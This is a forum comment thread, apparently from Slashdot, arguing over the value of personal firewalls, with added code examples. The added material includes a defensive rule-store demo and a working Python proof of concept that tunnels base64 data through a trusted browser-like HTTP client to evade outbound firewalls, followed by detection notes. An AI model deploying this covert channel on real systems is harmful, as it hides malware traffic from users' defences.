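    d = tempfile.mkdtemp()
    ff = os.path.join(d, "firefox.exe")
    svc = os.path.join(d, "svchost.exe")
    with open(ff, "wb") as f:
        f.write(b"MZ constructed firefox build 1")
    with open(svc, "wb") as f:
        f.write(b"MZ constructed, not really svchost")

    store = RuleStore()
    out = ConnEvent(ff, "203.0.113.10:443")
    first = store.decide(out)                 # unknown binary -> prompt
    store.remember(out, ALLOW)                # user answers "allow"
    second = store.decide(out)                # same hash -> allow silently
    listen = store.decide(ConnEvent(ff, "0.0.0.0:8080", listening=True))
    # outbound allow does not cover listening -> prompt

    with open(ff, "wb") as f:                 # update (or trojanised replacement)
        f.write(b"MZ constructed firefox build 2")
    third = store.decide(out)                 # hash changed -> prompt again

    generic = store.decide(ConnEvent(svc, "198.51.100.7:80"))  # no context
    named = ConnEvent(svc, "198.51.100.7:80", context="wuauserv")
    store.remember(named, DENY)
    fourth = store.decide(named)
    return {"first": first, "second": second, "listen": listen,
            "third": third, "generic": generic, "named": fourth}


if __name__ == "__main__":
    print(demo())
```

The trade-off is visible in the demo: every legitimate update of a trusted program costs one more prompt, which is exactly the behaviour comment 19 sees and comment 20 says trains users to click "allow" without reading. Keying on a code-signing identity instead of a raw hash would reduce that churn for signed updates; the hash version is shown because it needs nothing platform-specific.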

  21. How about configuring the software first? by brunokummel · · Score: 2, Insightful

I haven't found it in TFA, but then again I read it in a rush because my boss was in the room, but I guess they performed the test the way most regular users use a personal firewall.
This means press install, press next, next, next, next, OK and done, I have my own personal protection!
If you take the time to tune the software firewall, I'm pretty sure you would have much better results.

    --
    What is best in life? To crush your enemies, to see them driven before you and to hear the lamentations of their women.
  22. It lasted a whole 10 minutes? by Moraelin · · Score: 2, Interesting

    I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

    Basically the story is that I had managed to fry my home machine, didn't have a second computer at the time, but hey, looks like I got enough older parts for one (or a couple of them.) Stupidly enough, the firewall program (Sygate was my favourite at the time) was among the few things I had never backed up, but otherwise I could have a computer to play with in an hour or so.

Now I could have, of course, gone and bought some security program, or could have downloaded it at work and burned it on a CD, or whatever. I chose to just do a sacrificial install instead. As in, you know, install Windows, go online unprotected long enough to download a firewall, reformat, reinstall Windows. I fully expected the first install to get virused, but that's ok, since it would get reformatted a few minutes later.

    It also was Windows 2000, not XP, so no activation hassle.

    Well... let's just say that what I didn't expect was how fast the thing got virused. I expected it to get virused eventually, yes, but it got owned within a couple of minutes. Scary.

    --
    A polar bear is a cartesian bear after a coordinate transform.
  23. ZoneAlarm + broadband router = happiness by WidescreenFreak · · Score: 5, Insightful

    Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.

For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's finished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.

    Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.

    ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, it just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.

    Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but they've been getting better at its stability over the past several revisions from what I can tell.

    --
    The Overrated mod is for reversing inappropriate, positive mods, not for voicing disagreement with a post.
  24. Virtual firewalls on virtual machines by plankrwf · · Score: 2, Informative

Some of the problems with 'virtual firewalls' can be solved through real firewalls on ... virtual machines (i.e. Sieve at http://sievefirewall.sourceforge.net/ or at http://www.vmware.com/vmtn/appliances/directory/245)

  25. [OT] Re:Link to "printable" version of stories! by Ma�djeurtam · · Score: 4, Interesting

    If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?

    --
    Instant Karma's gonna get you, Gonna knock you right on the head (John Lennon, 1970)
    1. Re:[OT] Re:Link to "printable" version of stories! by jmarkantes · · Score: 2, Interesting

      They should be doing things right by using a different media ("print") in their CSS. That way they could display ads on the screen, and when people print it's still formatted correctly.

      Regular users wouldn't be able to just click the print link to bypass ads, and advanced users could display on screen the print style sheet.

      J

  26. Winpooch by jhfry · · Score: 3, Informative

    This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.

    It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.

    And it allows me to use ClamWin to do on access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.

    Best of all it's opensource.

    --
    Sometimes the best solution is to stop wasting time looking for an easy solution.
  27. Re:duhhhh.... by Akaihiryuu · · Score: 2, Interesting

I used to work tech support for Verizon DSL (ick) and we saw problems with this all the time. People would have McAfee installed and it would spontaneously decide to deny IE outbound access. (Now, customers using IE is a whole separate can of worms, but I don't feel like writing a novel so I won't go into that here... I "fixed" many computers by removing the IE shortcut from the desktop and installing Firefox.) The McAfee issue happened frequently enough that I doubt it was something that the user misconfigured; some of the people didn't even know they had McAfee (it came with the computer). The symptoms would be: you could ping anything you wanted, but any attempt at websurfing would time out, even to other devices on the LAN (like the cheap routers we supplied). I even saw times where McAfee would deny access to the 192.168.x.x LAN address but allow general internet access. We didn't support firewalls when I worked there, so the customer was instructed to disable the firewall and then access came back. Trying to use a firewall to block *outbound* traffic is kind of dumb. If there's malicious software on your computer, it's already too late for more software to solve the problem.

  28. A firewall is a *device* by Curmudgeonlyoldbloke · · Score: 4, Insightful

And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel room in which you're sitting? Wave it around in mid-air or something?

    Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).

  29. Personal firewalls quite useful by MobyDisk · · Score: 2, Interesting

    There are ways around personal firewalls, therefore personal firewalls are useless.

    So says an article linked by an article linked by an article that I can't really read. Pardon me if I am not convinced.

I'm quite content with the personal firewall I have. It stops lots of outbound connections from applications that like to phone home. If there is an app on my system that searches for IE windows and uses them to surreptitiously send data out -- I'm already f*d. Fortunately, my firewall blocks IE so I'm not vulnerable to that one. (It could use Firefox though).

  30. Biggest problem with personal firewalls by totallygeek · · Score: 3, Interesting

    Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.

  31. Better than nothing by embracethenerdwithin · · Score: 4, Insightful
I never assumed my software firewall was some amazing thing that kept me 100% safe. But I would still never want to surf without one. I don't care if it only protects against some attacks, it's definitely better than none. I would rather be protected from a little than nothing.

    My view has always been that using a combination of things that help is the best idea. Using a router that has a hardware firewall + a software firewall + antivirus + a secure browser (Firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.

    1. Re:Better than nothing by embracethenerdwithin · · Score: 2, Interesting
I forgot to mention using Ad-Aware or something like it. That's also very helpful.

      And if you don't want to use a firewall or anti virus, please come to my college and connect to the network. Wait 10 minutes while your computer gets owned.

Within 1 hour of moving into my apartment on campus, ZoneAlarm has logged almost 1,000 inbound access attempts... now that's scary.

  32. Trivial to Bypass by ThinkFr33ly · · Score: 3, Interesting

    I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.

Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is to piggyback your communications over an existing application that's trusted.

    Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.

I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I set up a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.

The best part was that *every* major outgoing firewall failed to detect this attempt, despite the fact they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.
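The exchange the comment above describes, as an added example that is not the commenter's VB/COM code: a server that answers plain HTTP GETs with base64 inside an HTML body, and a client that never opens a socket of its own but asks an already-trusted HTTP client to fetch the page and decodes the payload out of it. Python's urllib stands in for driving IE over COM, the "remote data" and the `?q=` parameter are constructed for the demo, and everything runs against a server on 127.0.0.1 so it works offline.

```python
"""Covert channel riding on a trusted HTTP client (added example).

Server side: GET /?q=<key> returns the bytes for <key>, base64-encoded in an
otherwise ordinary HTML page.  Client side: the request goes out through a
client the personal firewall already allows (urllib here; IE via COM in the
original PoC), and the payload is decoded from the returned page.
REMOTE_DATA and the "q" parameter are constructed for this demo.
"""
import base64
import re
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse
from urllib.request import urlopen

# Constructed "remote data" the attacker-side server hands out per key.
REMOTE_DATA = {
    "cmd": b"collect ~/Documents/*.xls",
    "update": b"\x00\x01binary-blob\xff",
}

PAYLOAD_RE = re.compile(r'<pre id="d">([A-Za-z0-9+/=]*)</pre>')


def encode_in_html(data: bytes) -> bytes:
    """Wrap arbitrary bytes as base64 inside a page that looks like any other."""
    b64 = base64.b64encode(data).decode("ascii")
    html = f'<html><body><p>ok</p><pre id="d">{b64}</pre></body></html>'
    return html.encode("ascii")


def decode_from_html(html: bytes) -> bytes:
    """Pull the base64 payload back out of the page the trusted client fetched."""
    m = PAYLOAD_RE.search(html.decode("ascii", errors="replace"))
    if m is None:
        raise ValueError("no payload in page")
    return base64.b64decode(m.group(1))


class TunnelHandler(BaseHTTPRequestHandler):
    """Server side of the channel: one GET in, one HTML page out."""

    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        key = query.get("q", [""])[0]
        body = encode_in_html(REMOTE_DATA.get(key, b""))
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server() -> ThreadingHTTPServer:
    srv = ThreadingHTTPServer(("127.0.0.1", 0), TunnelHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_via_trusted_client(url: str) -> bytes:
    """Stand-in for automating IE: the socket belongs to a client the PFW allows."""
    with urlopen(url, timeout=5) as resp:
        return resp.read()


def tunnel_fetch(base_url: str, key: str) -> bytes:
    """Client side: request <key> through the trusted client, decode the answer."""
    return decode_from_html(fetch_via_trusted_client(f"{base_url}/?q={key}"))


def demo_roundtrip(key: str = "cmd") -> bytes:
    """Full exchange against a local server; returns the decoded remote data."""
    srv = start_server()
    try:
        host, port = srv.server_address
        return tunnel_fetch(f"http://{host}:{port}", key)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo_roundtrip("cmd"))
```

What a per-application outbound filter sees here is the browser making an ordinary GET, which is precisely why it has nothing to prompt about. The signals that do exist sit elsewhere: the process relationship (an unrelated program instantiating and driving the browser), or an egress proxy log showing the browser fetching the same odd host with no user navigation behind it.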

  33. Re:IP Tables by mpapet · · Score: 4, Informative

    Linux has IP Tables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.

    Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the IP tables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!

http://www.google.com/search?hs=3PG&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=iptables&btnG=Search

    --
    http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
  34. BSD firewall tutorial (was Re:misleading headline) by badger.foo · · Score: 5, Informative
    The manuscript at http://www.bgnett.no/~peter/pf/ is for a half day tutorial in setting up OpenBSD's PF firewall (also available on FreeBSD, NetBSD and DragonFlyBSD).

    The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.

    The fact that it includes a few tips on how to give spammers a hard time helps too I guess.

    --
    -- That grumpy BSD guy - http://bsdly.blogspot.com/
  35. In my experience software firewalls are invaluable by brokeninside · · Score: 2, Interesting

Of course, they aren't perfect. But I've got a friend who was having recurring problems with various malware. I set her up with Zone Alarm, Anti-Vir, Ad Aware and advised her to download Firefox to browse with rather than using IE. Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else. Further, she gets to see what programs try to access the internet.

  36. ISP's hate firewalls by phorm · · Score: 3, Interesting

    I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.

  37. Incomplete is not always "useless" by Beryllium+Sphere(tm) · · Score: 2, Insightful

    An incomplete defense is useless in a chess game because your opponent will attack via the hole you left and you'll lose. If you're defending against ego-driven attackers or attackers who target you personally then it's appropriate to try for a security posture with no holes in it.

    Mass-produced malware is usually not built for pride of workmanship. It is commercial software built to make money and is not a fraction better than it needs to be.

    The right question to ask about effectiveness is what fraction of the spyware in circulation will be controlled by Zone Alarm and its kin. We accept a detection rate of 50-80% from antispyware programs. The threshold for a program like Zone Alarm should be higher because it has to be worth the hassles it causes, of course.

    Those hassles are probably inevitable. If you try to control outgoing traffic you are trying to add a feature that should have been in the OS, namely a new permissions system. Turf wars with the OS and destabilization due to hooking deep APIs are certain to happen. Historically if you attempted to touch the Windows network stack (PGPNet, for example, and the Freedom software forced me into a wipe and reinstall) you broke it.

    Outbound traffic controls are harder to subvert but less effective if you do them outside the client machine. How can a separate firewall box know whether a port is being opened by BitTorrent or by CoolWebSearch?

  38. Re:IP Tables by msobkow · · Score: 2, Interesting

openSuSE 10.1 actually makes it sickeningly easy to configure a firewall, subnet masquerading, DNS merging, and port forwarding. It took less than two hours to get it all working (including dial-up and DHCP network alteration of the DNS forwarding.) IIRC it took almost two days to get it working with RedHat 5.2.

    I realize it's not a fair comparison, as there is over 5 years of dev work in between the two, but the point is you don't need much knowledge, just a spare dual-nic box that'll run one of the more recent distros.

    A friend of mine is a bit annoyed. It was faster and easier to set up SuSE's firewall and have it working reliably than his WinXP dial-up node. :P

    --
    I do not fail; I succeed at finding out what does not work.
  39. Idiotic article. Blame your tools. by syousef · · Score: 2, Insightful

    This article basically says personal firewalls are useless because there are things they can't prevent. Recently I've seen someone argue antivirus software is useless because they aren't 100% accurate and won't catch all your virii. Okay well I have some screwdrivers at home. I want to put together a cupboard this evening. I'll only need the phillips head. Should I throw out the flathead since it won't do all my work for me? Moronic.

    Yes, software firewalls have their problems. Yes, they do require some knowledge to use correctly (as does almost all software!)

Personally I use a hardware firewall for incoming, a software firewall for inbound, I do run as admin because Windows just isn't designed to be run well from an unprivileged account. I use antivirus too though I do switch it off if my computer's going to be doing something CPU or disk intensive AND I'm not doing anything I consider risky.

    Furthermore you can't test 6 bits of firewall software and extrapolate that they're all garbage from the sample.

    --
    These posts express my own personal views, not those of my employer